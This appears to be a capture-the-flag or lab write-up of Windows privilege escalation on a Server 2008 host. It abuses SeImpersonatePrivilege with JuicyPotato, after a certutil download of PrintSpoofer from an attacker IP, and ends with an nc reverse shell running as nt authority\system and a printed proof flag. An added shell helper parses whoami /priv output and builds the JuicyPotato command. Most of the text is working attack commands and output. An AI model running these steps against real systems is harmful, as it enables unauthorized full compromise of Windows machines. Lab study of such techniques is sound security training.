Priv Esc

C:\wamp\www>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

The token holds SeImpersonatePrivilege, which is what the potato family (JuicyPotato, PrintSpoofer) abuses to impersonate a SYSTEM token, so that is the path to try first. Pull a binary over with certutil:
C:\ProgramData>certutil.exe -urlcache -f http://192.168.45.239/PrintSpoofer32.exe printspoofer.exe
certutil.exe -urlcache -f http://192.168.45.239/PrintSpoofer32.exe printspoofer.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

PrintSpoofer does not run on this Windows Server 2008 host, so fall back to JuicyPotato (x86 build, since the 32-bit PrintSpoofer was the one tried) and upload it together with the reverse-shell payload over the FTP access:

ftp> put JuicyPotatox86.exe
local: JuicyPotatox86.exe remote: JuicyPotatox86.exe
229 Entering Extended Passive Mode (|||2053|)
150 File status okay; about to open data connection.
100% |*************************************************|   257 KiB    1.58 MiB/s    00:00 ETA
226 Closing data connection.
263680 bytes sent in 00:00 (1.06 MiB/s)
ftp> put pwned.exe
local: pwned.exe remote: pwned.exe
229 Entering Extended Passive Mode (|||20
150 File status okay; about to open data 
100% |***********************************
226 Closing data connection.
73802 bytes sent in 00:00 (455.07 KiB/s)
JuicyPotatox86.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -l 1337 -p "C:\wamp\www\pwned.exe"
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.246.46] 49162
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
LIVDA
nt authority\system
438e44340d9a8c643fdbc13305432ba9

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::993b:14ec:27b5:7c4e%12
   IPv4 Address. . . . . . . . . . . : 192.168.246.46
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.246.254

Tunnel adapter Local Area Connection*:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
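The steps above (read `whoami /priv`, decide that a potato-style attack applies, run JuicyPotato with a CLSID, listen port and payload) as one small POSIX shell helper. This is an added example written for this page; it is not the original notes' code and not part of JuicyPotato or PrintSpoofer. The `whoami /priv` table it parses is a constructed copy of the one captured above, and the CLSID, port and payload path are the ones from the JuicyPotato command above. SeAssignPrimaryTokenPrivilege is checked alongside SeImpersonatePrivilege because JuicyPotato accepts either, and the State column is ignored on purpose: a privilege the token holds but shows as Disabled can still be enabled by the process, so "held" is the test, not "Enabled".

```shell
#!/bin/sh
# Added example, not code from the original notes: decide from a pasted
# `whoami /priv` table whether a potato-family escalation is worth trying,
# then build the JuicyPotato command line.

# Constructed sample input: a copy of the `whoami /priv` output on the page.
SAMPLE_PRIVS='PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled'

# Print the names of the privileges the token holds (first column of the
# table). The State column is deliberately ignored: a held privilege that
# shows as Disabled can be enabled by the process itself.
held_privs() {
    printf '%s\n' "$1" | awk '/^Se[A-Za-z]+Privilege/ { print $1 }'
}

# Exit 0 if the token holds a privilege JuicyPotato/PrintSpoofer can use.
potato_candidate() {
    held_privs "$1" | grep -qxE 'SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege'
}

# Build the JuicyPotato invocation: -t * tries both CreateProcess variants,
# -c is the COM server CLSID, -l the local COM listen port, -p the payload.
juicy_cmd() {
    clsid=$1; port=$2; payload=$3
    printf 'JuicyPotatox86.exe -t * -c %s -l %s -p "%s"' "$clsid" "$port" "$payload"
}

# Stand-alone run: print the command line if the sample token qualifies.
if potato_candidate "$SAMPLE_PRIVS"; then
    juicy_cmd '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}' 1337 'C:\wamp\www\pwned.exe'
    echo
else
    echo 'no SeImpersonate/SeAssignPrimaryToken held: potato attacks do not apply'
fi
```

Run it on the attacker box against a pasted `whoami /priv` capture; the printed line is what gets typed into the target shell. The CLSID is specific to the target's Windows version, so it is a parameter here rather than a constant.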
